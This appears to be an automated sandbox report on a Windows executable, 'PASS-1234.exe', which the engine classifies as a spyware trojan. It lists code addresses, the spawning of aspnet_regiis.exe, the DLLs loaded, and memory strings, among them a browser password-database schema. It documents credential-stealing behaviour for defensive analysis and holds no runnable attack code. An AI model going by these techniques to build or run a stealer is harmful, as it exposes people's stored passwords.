                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D3863E0 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6D3863E0
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BB48200_2_00BB4820
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BB68600_2_00BB6860
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BB71700_2_00BB7170
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BC51500_2_00BC5150
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BCE9400_2_00BCE940
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BB83F00_2_00BB83F0
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B99B3A0_2_00B99B3A
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BCF3300_2_00BCF330
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BB5B600_2_00BB5B60
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BE94900_2_00BE9490
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BCEC100_2_00BCEC10
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B99C680_2_00B99C68
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B985BA0_2_00B985BA
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BD05900_2_00BD0590
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BCBDC00_2_00BCBDC0
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BE8E100_2_00BE8E10
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BB3E000_2_00BB3E00
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BB76000_2_00BB7600
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B976680_2_00B97668
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B9D7F90_2_00B9D7F9
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BE97E00_2_00BE97E0
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D387E400_2_6D387E40
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D3819300_2_6D381930
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D3863E00_2_6D3863E0
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D3995310_2_6D399531
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D3810000_2_6D381000
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D38EB400_2_6D38EB40
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D3843A00_2_6D3843A0
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D3872200_2_6D387220
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BEB1200_2_00BEB120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0317AB303_2_0317AB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0317D37F3_2_0317D37F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03196B603_2_03196B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031913D03_2_031913D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AFA203_2_031AFA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031809973_2_03180997
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0317D9CE3_2_0317D9CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A88E03_2_031A88E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031837563_2_03183756
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031927AF3_2_031927AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319CE113_2_0319CE11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03192E223_2_03192E22
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031786D03_2_031786D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031934503_2_03193450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031B04403_2_031B0440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319C31F3_2_0319C31F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03189B003_2_03189B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031863223_2_03186322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318ABC03_2_0318ABC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319F23E3_2_0319F23E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AD25E3_2_031AD25E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031842503_2_03184250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03178A403_2_03178A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318DA403_2_0318DA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03195A7F3_2_03195A7F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031762703_2_03176270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A92603_2_031A9260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AF2603_2_031AF260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03193A903_2_03193A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031792B03_2_031792B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031742D03_2_031742D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A12C03_2_031A12C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319C2C63_2_0319C2C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AF1103_2_031AF110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031961303_2_03196130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031991293_2_03199129
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031739203_2_03173920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318E1203_2_0318E120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319D1503_2_0319D150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031759603_2_03175960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319219F3_2_0319219F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AF1C03_2_031AF1C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031889FD3_2_031889FD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031909F03_2_031909F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319D8193_2_0319D819
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031920703_2_03192070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031998623_2_03199862
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031863223_2_03186322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031B00B03_2_031B00B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031988D43_2_031988D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031870CA3_2_031870CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A68FE3_2_031A68FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AE8F63_2_031AE8F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319A0E03_2_0319A0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03196F103_2_03196F10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A7F103_2_031A7F10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03172F003_2_03172F00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031767003_2_03176700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03196F303_2_03196F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031797703_2_03179770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03187F963_2_03187F96
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319C7B23_2_0319C7B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AEFA03_2_031AEFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319AFD03_2_0319AFD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031957D03_2_031957D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0317AFC03_2_0317AFC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03193FF23_2_03193FF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A07EF3_2_031A07EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03178FE03_2_03178FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318E6303_2_0318E630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0317DE263_2_0317DE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03197E693_2_03197E69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318F6903_2_0318F690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03175EB03_2_03175EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AEEB03_2_031AEEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0319C6D93_2_0319C6D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318AEC03_2_0318AEC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318C6F83_2_0318C6F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318DD103_2_0318DD10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AFD303_2_031AFD30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A95203_2_031A9520
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03193D503_2_03193D50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AC5403_2_031AC540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A2D703_2_031A2D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A85903_2_031A8590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0317C5863_2_0317C586
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03198DA03_2_03198DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318BDF03_2_0318BDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0318E4303_2_0318E430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03186C2F3_2_03186C2F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AD45C3_2_031AD45C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031991293_2_03199129
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A9C573_2_031A9C57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A64553_2_031A6455
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_03174C603_2_03174C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031964D73_2_031964D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031774F03_2_031774F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 03184240 appears 75 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 03178080 appears 41 times
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1224
                Source: PASS-1234.exe, 00000000.00000000.2146853018.0000000000C4E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMadisonVioletTessa.pdfKD4 vs PASS-1234.exe
                Source: PASS-1234.exe, 00000000.00000002.2208701388.000000000134E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PASS-1234.exe
                Source: PASS-1234.exeBinary or memory string: OriginalFilenameMadisonVioletTessa.pdfKD4 vs PASS-1234.exe
                Source: PASS-1234.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PASS-1234.exeStatic PE information: Section: C;FTo ZLIB complexity 1.0003192278119508
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@3/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031A88E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_031A88E0
                Source: C:\Users\user\Desktop\PASS-1234.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1916
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2744f6cc-0d69-4e62-9e70-1b5fe4428f27Jump to behavior
                Source: PASS-1234.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\Desktop\PASS-1234.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: aspnet_regiis.exe, 00000003.00000003.2702043018.00000000058CB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701922258.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2713729437.00000000058E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PASS-1234.exeString found in binary or memory: -addpset
                Source: PASS-1234.exeString found in binary or memory: -addfulltrust
                Source: PASS-1234.exeString found in binary or memory: -addgroup
                Source: PASS-1234.exeString found in binary or memory: -help
                Source: C:\Users\user\Desktop\PASS-1234.exeFile read: C:\Users\user\Desktop\PASS-1234.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PASS-1234.exe "C:\Users\user\Desktop\PASS-1234.exe"
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 1224
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: PASS-1234.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PASS-1234.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: \??\C:\Users\user\Desktop\PASS-1234.PDB source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdba source: WERECA6.tmp.dmp.6.dr
                Source: Binary string: %%.pdb source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: HP^o0C:\Windows\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WERECA6.tmp.dmp.6.dr
                Source: Binary string: mscorlib.pdb Cultu source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5t source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdb source: WERECA6.tmp.dmp.6.dr
                Source: Binary string: \??\C:\Windows\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbN source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.ni.pdbRSDS source: WERECA6.tmp.dmp.6.dr
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbxi source: PASS-1234.exe, 00000000.00000002.2208701388.0000000001381000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Desktop\PASS-1234.PDB source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp

                Data Obfuscation

                barindex
